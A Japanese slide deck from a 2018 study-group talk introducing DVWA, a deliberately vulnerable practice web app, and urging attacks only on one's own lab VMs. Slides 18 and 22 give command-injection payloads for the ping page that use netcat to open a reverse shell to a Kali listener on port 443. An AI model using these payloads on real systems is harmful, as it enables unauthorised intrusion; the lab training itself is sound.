セキュリティスキルのアップしたい方向けに 実際に手を動かしながら攻撃と防御の自己学習がしやすい DVWAを紹介します。

1. DVWAで爆上げ
WebAppセキュリティスキル
@shunaroo
とっしんの会 #5
2018/05/12

2. 自己紹介
@shunaroo
• 社会人6年目の社内SE
• SE向け新人研修(最近していない）
• 社内向けWebシステム開発（Java系)
• セキュリティ対策支援（最近）
• 7月からセキュリティエンジニアに…!
• 興味がある分野
• セキュリティ分野（今日も話します）
「セキュリティのアレ」を見てからハマる
http://www.atmarkit.co.jp/ait/subtop/features/ait/are.html
Wow

3. このスライドの目標
WebAppセキュリティを学びたい人が
スキルアップするための参考になること
DVWAは脆弱性を含んだWebApp
攻撃と防御の練習にお勧め！

4. 最近やっているスキルアップ法
①IT基礎技術を学ぶ
セキュリティ問題は基礎知識の先にある問題なので
②英語の動画を見る
セキュリティの情報は英語が圧倒的に多いので
③実際にやってみる
やらないと身につかないし怖さもわからないので
④最新の情報をキャッチアップ
セキュリティは生き物なので

5. 最近やっているスキルアップ法
①IT基礎技術を学ぶ
セキュリティ問題は基礎知識の先にある問題なので
②英語の動画を見る
セキュリティの情報は英語が圧倒的に多いので
③実際にやってみる ← 今日はこれにフォーカス
やらないと身につかないし怖さもわからないので
④最新の情報をキャッチアップ
セキュリティは生き物なので

6. セキュリティを学ぶ時の注意点
許可された範囲で攻撃する
why?
誰かまたは何かを守るためにセキュリティを学ぶはず
興味本位で許可されていないサイトへの攻撃はやめましょう
(サイト担当者の土日がなくなります。No More 不健康経営）
How
簡単なのは、自分のPCにやられ用VMを立てる

7. やられVM一覧
No 名前 URL
1 OWASP Broken Web
Application Project
https://www.owasp.org/index.php/OWASP_Broken_Web
_Applications_Project
2 BadStore https://www.vulnhub.com/entry/badstore-123,41/
3 Metasploitable2 https://sourceforge.net/projects/metasploitable/files/Met
asploitable2/
今回はこのVMの中にある
Damn Vulnerable Web Application（DVWA)
を紹介

8. DVWAとは
脆弱性が組み込まれたWebApp
脆
弱
性
ご
と
に
ペ
ー
ジ
が
用
意
さ
れ
て
い
る

9. 特徴
脆弱性と対策を学びやすくする以下機能がある
①脆弱性レベル設定機能
②ソースコード表示機能

10. 特徴 ①脆弱性レベル設定機能
脆弱性(メニュー)ごとに3段階のレベルを設定することができる。
レベルに合わせてどのように攻撃できるか、
どのように守っているか考えながら学習できる
Low:無防備
Medium:ちょっと対策
Highまあ安全

11. 特徴 ②ソースコード表示機能
実際にどのようなコードで書いているかが見れる
どのように書くと危険か、安全かを確認することができる
どのように制御している
かをページごとに確認で
きる

12. じゃあ やってみよう！

13. 今回やること概要
やる側VM やられる側VM
Kali Linux
すごく強い
Metasploitable2
すごく弱い
攻撃
検証用ホストOS
対象の脆弱性：Commnand Execution
攻撃概要 :Netcatコマンドをインジェクションして、
リバースシェルによる攻撃対象へのリモートログイン
環境概要
横文字無双！
強制接続
Netcatコマンド
やる側でやられる側
にあるシェルを実行

14. Command Executionページ概要
指定した宛先にPingを送信する機能を持つページ

15. Level:Low（問題）
ソース
もらった入力値は検査しない
文字列「ping + 入力値」に変換し
シェルコマンドを実行

16. Level:Low（解法）
シェルの仕組みを利用して、ping以外のコマンドを実行
シェルは「;」で区切ることで複数のコマンドを実行できる
例）pwdコマンド＋idコマンド
インジェクションするNetcatコマンドについては、説明を省略

17. Level:Low（実演準備）
準備
Kali Linux側でNetcatをリッスンモードで待機
443ポートを指定したのは、やられ側にHTTPS通信をしていると
錯覚させるため

18. Level:Low（実演）
入力値に以下を入力
127.0.0.1;nc -e /bin/sh 192.168.1.4 443
リモートログイン成功！

19. Level:Medium（問題）
ソース
入力前処理で「;」を無効化

20. Level:Medium（解法）
シェルの仕組みを利用して、ping以外のコマンドを実行
シェルは「|」で区切ることで複数のコマンド組み合わせて実行できる
例）lsコマンド＋moreコマンド

21. Level:Medium（実演準備）
準備
Kali Linux側でNetcatをリッスンモードで待機
443ポートを指定したのは、やられ側にHTTPS通信をしていると
錯覚させるため

22. Level:Medium（実演）
入力値に以下を入力
127.0.0.1|nc -e /bin/sh 192.168.1.4 443
リモートログイン成功！

23. Level:High（問題）
ソース
Ipv4形式に入力値しか受け付けなくしている

24. Level:High （解法）

25. まとめ
このスライドでは
セキュリティスキルのアップしたい方向けに
実際に手を動かしながら攻撃と防御の自己学習がしやすい
DVWAを紹介しました。
DVWAでは今回紹介した脆弱性以外にも様々な脆弱性が隠れています。
悩んで困ったら、ネットで検索しましょう。
世界中の人がいろいろな解法を掲載しています。
ほかの人のやり方も学ぶことで、より視野を広げていきましょう！（私も！）